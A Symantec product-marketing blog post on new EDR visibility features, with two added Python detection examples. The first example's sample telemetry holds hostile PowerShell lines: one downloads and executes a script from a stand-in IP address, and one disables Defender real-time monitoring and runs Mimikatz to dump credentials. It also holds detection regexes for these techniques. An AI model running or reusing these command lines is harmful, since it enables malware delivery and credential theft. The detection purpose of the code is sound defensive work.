Product Insights

New Visibility Features in Symantec Endpoint Detection and Response (EDR)

A rising number of cyber attacks exploit common blind spots in enterprise infrastructures. The new Symantec EDR toolset is a strong defense against attackers

Cyber security is a relentless, high-stakes game of cat-and-mouse, and nowhere is this more true than in endpoint security. As enterprises have ramped up their investment in tools such as endpoint protection platforms (EPP) and endpoint detection and response (EDR) solutions, cyber criminals have kept pace. Forced to find new ways to launch attacks, they keep evolving, adapting and developing ever more sophisticated attack strategies.

A principal attack strategy is to identify and target common blind spots in enterprise security infrastructures. Many of Symantec’s recent strategic investments in security products and services are aimed at attackers’ efforts to exploit exactly these blind spots. Symantec, a division of Broadcom (NASDAQ: AVGO), has added new capabilities to its EDR portfolio, extending its investment in advanced protection.

These new tools are available as features of our flagship Symantec Endpoint Security Complete (SESC) product. As our foundational security platform, SESC is designed to address security issues, and the attack chain as MITRE ATT&CK describes it, the only way that makes sense: holistically. SESC provides that holistic perspective while its individual tools and features address each link in the chain, from preventing threats early in the cycle to quickly detecting breaches and disabling attacks in progress.

Most of the new features address three of the most common and potentially most dangerous blind spots we see across the majority of organizations:

  • Trusted tools and applications
  • Unprotected Active Directory (AD)
  • Late discovery of breaches 

Ending “Living Off the Land” Attacks

Trusted tools and apps are legitimate applications, dual-use tools and scripts that almost no organization can avoid running. Virtually every organization uses Microsoft Office and PowerShell for worker productivity and routine Windows task automation. Along with third-party applications such as Adobe Reader and Acrobat, they are practically ubiquitous and, as a consequence, trusted by default in the workplace.

In the colorful language of cyber security, attacks that use these commonly available, pre-installed tools are referred to as “living off the land” attacks. In other words, the attacker is using an organization’s own technology (land) to gain access to its most valuable data, financial, and other resources. 

A major problem is that it has been very hard to see what these applications and their scripts actually do once they execute, because the real payload often exists only in memory, decoded or de-obfuscated by the script engine itself at run time. SESC closes that blind spot by using a Microsoft technology called the Antimalware Scan Interface (AMSI), which the script engine calls with the content of a script immediately before executing it, after the layers of obfuscation the engine resolves. AMSI therefore acts as a window into scripts running on an endpoint, such as PowerShell or Microsoft Office macros. The Symantec agent collects that content and makes it searchable, so that malicious scripts can be uncovered regardless of how they were disguised on disk.

A Malicious PowerShell script is decoded by AMSI, associated with MITRE ATT&CK techniques, and correlated with other activities
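As an added illustration (example code written for this article, not part of Symantec's product or the original post), the following Python triage routine shows what "seeing through" a living-off-the-land script involves: it strips the Base64/UTF-16LE layer of a PowerShell -EncodedCommand argument and then maps the indicators in the recovered text to MITRE ATT&CK technique IDs. AMSI does the equivalent at run time inside the script engine; this offline version works on process-creation records instead. The three records, the host names, the URL and the indicator-to-technique table are constructed for the example, and the table is only a small illustrative subset of what a real rule set covers.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional


def _encode_command(script: str) -> str:
    """Build a PowerShell -EncodedCommand argument: UTF-16LE text, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real data): process-creation records of the
# kind an endpoint agent collects. Event 2 hides its intent behind -EncodedCommand.
SAMPLE_EVENTS = [
    {"host": "WS-0142", "pid": 4120, "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s1.ps1')\""},
    {"host": "WS-0142", "pid": 4188, "parent": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _encode_command(
         "Set-MpPreference -DisableRealtimeMonitoring $true; Invoke-Mimikatz -DumpCreds")},
    {"host": "WS-0077", "pid": 912, "parent": "svchost.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\Backup-Logs.ps1 -Retention 30"},
]

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...), while
# -ep is -ExecutionPolicy and must not match.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# Illustrative indicator -> ATT&CK mapping; a subset chosen for this example,
# not Symantec's rule set.
INDICATORS = [
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
     "T1105", "Ingress Tool Transfer"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
     "T1564.003", "Hide Artifacts: Hidden Window"),
    (re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
     "T1562.001", "Impair Defenses: Disable or Modify Tools"),
    (re.compile(r"Invoke-Mimikatz|sekurlsa::", re.I),
     "T1003.001", "OS Credential Dumping: LSASS Memory"),
]
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}


@dataclass
class Finding:
    host: str
    pid: int
    decoded: Optional[str]                      # text recovered from -EncodedCommand, if any
    techniques: Dict[str, str] = field(default_factory=dict)  # technique id -> name

    @property
    def suspicious(self) -> bool:
        # Every PowerShell launch is T1059.001; only flag when something more is seen.
        return any(t != "T1059.001" for t in self.techniques)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> Finding:
    """Map one process event to ATT&CK techniques, looking through the encoding layer."""
    decoded = decode_encoded_command(event["cmdline"])
    finding = Finding(event["host"], event["pid"], decoded,
                      {"T1059.001": "Command and Scripting Interpreter: PowerShell"})
    if decoded is not None:
        finding.techniques["T1027"] = "Obfuscated Files or Information"
    if event["parent"].upper() in OFFICE_PARENTS:
        finding.techniques["T1204.002"] = "User Execution: Malicious File"
    # Scan the raw command line (switches live there) and the decoded body together.
    text = event["cmdline"] + "\n" + (decoded or "")
    for pattern, tid, name in INDICATORS:
        if pattern.search(text):
            finding.techniques[tid] = name
    return finding


def triage(events: List[dict]) -> List[Finding]:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if f.suspicious else "benign"
        print(f"{f.host} pid={f.pid} {flag} {sorted(f.techniques)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Two details matter in practice: the decoder only treats a token as encoded if it sits after a switch PowerShell really interprets as -EncodedCommand (so "-ep bypass" is not mistaken for one), and the third record, ordinary scheduled automation, ends up with nothing beyond the baseline technique, which is what keeps a rule like this from drowning the SOC in noise.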

Preventing the Chief Source of Ransomware

Most organizations have their endpoints joined to Active Directory, and a great deal of information is reachable through it, above all information about credentials and privileged accounts that an attacker can use to move laterally across the organization and reach its most valuable resources. When attackers go after this data, many of their actions are recorded by Windows through Event Tracing for Windows (ETW); ETW can, for example, record an event when a remote desktop connection is established from a compromised endpoint. The problem has been that ETW is yet another data source that has to be correlated with everything else the agent records. Our SESC agent closes that blind spot, and with it what is in our experience the number one source of successful ransomware attacks, by tapping into that additional feed and automatically correlating it with all of the other activity belonging to an attack.

A discovery technique logged by ETW is shown in the Symantec EDR 4.5 console
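The correlation problem described above, as an added Python example (written for this article, not Symantec's code): one stream of process-start events from the endpoint agent and one stream of ETW-derived outbound RDP connection events are joined on host and process ID, walked up the process tree, and turned into an alert when the RDP client descends from a script interpreter that an Office application spawned within the last ten minutes. The events, hosts, PIDs and the ten-minute window are constructed assumptions for the example; the ETW record is reduced to the fields the join needs (timestamp, host, PID of the connecting process, target host), and the ATT&CK ID for RDP-based lateral movement is T1021.001. The PID-reuse handling (latest process start at or before the event time) is the check a practitioner would want on real telemetry, where PIDs are recycled.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessStart:
    """Process-creation record from the endpoint agent (constructed for this example)."""
    ts: datetime
    host: str
    pid: int
    ppid: int
    image: str


@dataclass(frozen=True)
class RdpConnect:
    """Outbound RDP connection as an ETW-derived record, reduced to the fields we join on."""
    ts: datetime
    host: str
    pid: int        # process that opened the connection (mstsc.exe or similar)
    target: str


@dataclass
class Alert:
    host: str
    target: str
    chain: List[str]               # image names from the RDP client up to the root
    technique: str = "T1021.001"   # Remote Services: Remote Desktop Protocol


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample telemetry (not real data). The first RDP session is opened by
# mstsc.exe whose ancestry runs back through PowerShell to Word; the second is an
# administrator's ordinary session from Explorer. PID 4300 is reused later.
PROCESS_EVENTS = [
    ProcessStart(_t("2020-11-05T10:00:00"), "WS-0142", 2000, 1, "explorer.exe"),
    ProcessStart(_t("2020-11-05T10:00:10"), "WS-0142", 3001, 2000, "WINWORD.EXE"),
    ProcessStart(_t("2020-11-05T10:00:15"), "WS-0142", 4120, 3001, "powershell.exe"),
    ProcessStart(_t("2020-11-05T10:03:30"), "WS-0142", 4300, 4120, "mstsc.exe"),
    ProcessStart(_t("2020-11-05T10:30:00"), "WS-0142", 5100, 2000, "mstsc.exe"),
    ProcessStart(_t("2020-11-05T11:00:00"), "WS-0142", 4300, 2000, "notepad.exe"),
]
RDP_EVENTS = [
    RdpConnect(_t("2020-11-05T10:03:32"), "WS-0142", 4300, "FS-01.corp.example"),
    RdpConnect(_t("2020-11-05T10:30:04"), "WS-0142", 5100, "JUMP-01.corp.example"),
]

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SCRIPT_HOSTS = {"POWERSHELL.EXE", "CMD.EXE", "WSCRIPT.EXE", "CSCRIPT.EXE", "MSHTA.EXE"}


class ProcessTable:
    """Index of process starts keyed by (host, pid), aware that PIDs are reused."""

    def __init__(self, events: List[ProcessStart]):
        self._by_key: Dict[Tuple[str, int], List[ProcessStart]] = {}
        for e in sorted(events, key=lambda e: e.ts):
            self._by_key.setdefault((e.host, e.pid), []).append(e)

    def lookup(self, host: str, pid: int, at: datetime) -> Optional[ProcessStart]:
        """The process that owned `pid` at time `at`: latest start at or before `at`."""
        cands = [e for e in self._by_key.get((host, pid), []) if e.ts <= at]
        return cands[-1] if cands else None

    def ancestry(self, host: str, pid: int, at: datetime) -> List[ProcessStart]:
        """Walk parent links from `pid` up to the root, guarding against cycles."""
        chain: List[ProcessStart] = []
        seen = set()
        cur = self.lookup(host, pid, at)
        while cur is not None and cur.pid not in seen:
            chain.append(cur)
            seen.add(cur.pid)
            cur = self.lookup(host, cur.ppid, cur.ts)
        return chain


def correlate(process_events: List[ProcessStart], rdp_events: List[RdpConnect],
              window: timedelta = timedelta(minutes=10)) -> List[Alert]:
    """Alert on each RDP connection whose client descends from a script host that an
    Office application spawned, with the script host started within `window`."""
    table = ProcessTable(process_events)
    alerts: List[Alert] = []
    for rdp in rdp_events:
        chain = table.ancestry(rdp.host, rdp.pid, rdp.ts)
        images = [p.image.upper() for p in chain]
        script_idx = next((i for i, img in enumerate(images) if img in SCRIPT_HOSTS), None)
        if script_idx is None:
            continue
        office_above = any(img in OFFICE_APPS for img in images[script_idx + 1:])
        recent = rdp.ts - chain[script_idx].ts <= window
        if office_above and recent:
            alerts.append(Alert(rdp.host, rdp.target, [p.image for p in chain]))
    return alerts


if __name__ == "__main__":
    for a in correlate(PROCESS_EVENTS, RDP_EVENTS):
        print(f"{a.technique} on {a.host}: RDP to {a.target} via {' <- '.join(a.chain)}")
```

Neither stream is alarming on its own: an RDP connection is routine, and so is a PowerShell process. The alert comes only from joining them and walking the tree, which is the work an agent has to do before ETW data is worth anything to an analyst.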

Additionally, SESC’s Threat Defense for Active Directory prevents, rather than merely detects, lateral movement by attackers who have stolen credentials. It does this by obfuscating account credentials in the endpoint’s memory, so that what an attacker harvests there misleads them; the process that then tries to use those credentials is automatically blocked to contain the attack.

The attacker’s command shell is automatically isolated after they attempted to run a process using stolen credentials.

Cutting Through the Noise

If an organization does suffer a breach, nothing matters more than discovering that fact as early as possible. To help with that, many organizations have deployed a growing number of security tools. The problem is that more tools mean more alerts, and SOC analysts end up fire-hosed with far more data streams than their limited time and resources can absorb.

SESC closes this third major blind spot. Using machine learning, SESC’s Threat Hunter looks for unusual behavior and alerts our own experts at Symantec when it finds it. Symantec threat hunters then immediately notify the organization’s SOC, dramatically reducing the time to respond to and remediate the breach.

We’ve Got Your Back

Taken together, these enhancements to SESC bring a new level of comprehensive security by closing the blind spots common to most enterprise security infrastructures. And they are not the only ones. We are constantly adding new features to SESC, such as Granular Activity Recorder Rules, which let analysts and system administrators collect data more efficiently and eliminate unnecessary event noise.

Granular Activity Recorder Rules in Symantec EDR 4.5

Another recently added feature lets you block non-executable files such as scripts and documents, closing what is not exactly a blind spot but another major gap in the response mechanisms of many EDR products.

All of these features are included in Symantec Endpoint Security Complete, the core of our defense-in-depth strategy and the foundation on which we will keep innovating, all built into a single agent on a single platform. From prevention to detection to augmenting your own security resources, in this relentless, high-stakes game of cyber security cat-and-mouse: we’ve got your back.

Webinar

Don’t Let Attackers Exploit your Blind Spots to Evade Detection

To learn more about how Symantec is strengthening its full-feature endpoint offering to protect against blind spots, join my colleague Gavin Fulton in this webinar on November 17, 2020, 10 a.m., PST.


About the Author

Adam Licata

Director of Product Management, Symantec Endpoint Security

Adam Licata is Director of Product Management for Endpoint Security at Symantec. Adam is leading the effort to transform Symantec’s market leading endpoint security product to a full cloud SaaS-based platform.
